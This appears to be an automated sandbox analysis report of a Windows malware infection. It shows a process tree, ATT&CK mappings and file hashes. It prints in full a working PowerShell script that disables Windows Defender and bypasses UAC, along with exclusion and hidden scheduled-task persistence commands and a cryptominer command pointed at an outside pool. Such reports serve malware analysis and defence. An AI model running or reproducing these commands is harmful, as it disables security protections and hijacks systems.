C:\ProgramData\images.exeC:\ProgramData\images.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3048
-
-
C:\ProgramData\images.exeC:\ProgramData\images.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1092
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\H3tyh96.exe"C:\Users\Admin\AppData\Local\Temp\a\H3tyh96.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6024 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6436
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4364
-
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5304
-
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵
- System Location Discovery: System Language Discovery
PID:6976
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 28484⤵
- Program crash
PID:1120
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\cat.exe"C:\Users\Admin\AppData\Local\Temp\a\cat.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4248
-
-
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"3⤵
- Executes dropped EXE
PID:1968
-
-
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"3⤵
- Executes dropped EXE
PID:4376
-
-
C:\Users\Admin\AppData\Local\Temp\a\dog.exe"C:\Users\Admin\AppData\Local\Temp\a\dog.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵PID:6368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 2125⤵
- Program crash
PID:804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe"C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:2664
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\a\Client-built.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6136
-
-
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6992
-
-
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6528
-
-
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6020 -
C:\Users\Admin\AppData\Local\complacence\outvaunts.exe"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4816 -
C:\Users\Admin\AppData\Local\complacence\outvaunts.exeC:\Users\Admin\AppData\Local\complacence\outvaunts.exe /stext "C:\Users\Admin\AppData\Local\Temp\cfvjjkn"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6956
-
-
C:\Users\Admin\AppData\Local\complacence\outvaunts.exeC:\Users\Admin\AppData\Local\complacence\outvaunts.exe /stext "C:\Users\Admin\AppData\Local\Temp\mhickcylzb"5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3216
-
-
C:\Users\Admin\AppData\Local\complacence\outvaunts.exeC:\Users\Admin\AppData\Local\complacence\outvaunts.exe /stext "C:\Users\Admin\AppData\Local\Temp\xboulvinnjbmv"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\profile1.exe"C:\Users\Admin\AppData\Local\Temp\a\profile1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1060 -
C:\Users\Admin\AppData\Local\Temp\a\profile1.exeC:\Users\Admin\AppData\Local\Temp\a\profile1.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1032
-
-
C:\Users\Admin\AppData\Local\Temp\a\profile1.exeC:\Users\Admin\AppData\Local\Temp\a\profile1.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5600
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3544 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵PID:5344
-
C:\Windows\system32\mode.commode 65,105⤵PID:6952
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p24291711423417250691697322505 -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6812
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6900
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5712
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2820
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6428
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:804
-
-
C:\Windows\system32\attrib.exeattrib +H "in.exe"5⤵
- Views/modifies file attributes
PID:3528
-
-
C:\Users\Admin\AppData\Local\Temp\main\in.exe"in.exe"5⤵
- Executes dropped EXE
PID:2032 -
C:\Windows\SYSTEM32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe6⤵
- Views/modifies file attributes
PID:5464
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe6⤵
- Views/modifies file attributes
PID:4400
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE6⤵
- Scheduled Task/Job: Scheduled Task
PID:6044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del in.exe6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5824 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2528
-
-
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 94.156.167.42:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=503⤵
- Suspicious use of FindShellTrayWindow
PID:6276
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 6368 -ip 63681⤵PID:5888
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:6920
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3968 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6600
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5292
-
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- System Location Discovery: System Language Discovery
PID:1532
-
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
- System Location Discovery: System Language Discovery
PID:4804
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4768
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4112 -ip 41121⤵PID:6828
-
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exeC:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2388 -
C:\Windows\explorer.exeexplorer.exe2⤵PID:228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:920 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.10.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5228
-
-
-
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exeC:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3200 -
C:\Windows\explorer.exeexplorer.exe2⤵PID:6040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1968 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.10.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5560
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Query Registry
6Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5712a00a9d8164b3b6795c4e11800d2f1
SHA182952ef15a2e4e2b06cb149d3b206d11135128b5
SHA2562a3b20384f9ce1100ea1c1d3fc24b874446506c627102da75ace1e7bcac4a052
SHA512ab87d76996cf96e76f9182f72ffe16b1e014ac1ccbe2991a6cd85309622365fbf4a6e79023e616c529640f626cd3943bab9338816bf6ce6831cf5696d28ecd17
-
Filesize
944B
MD53a6bad9528f8e23fb5c77fbd81fa28e8
SHA1f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2
-
Filesize
21KB
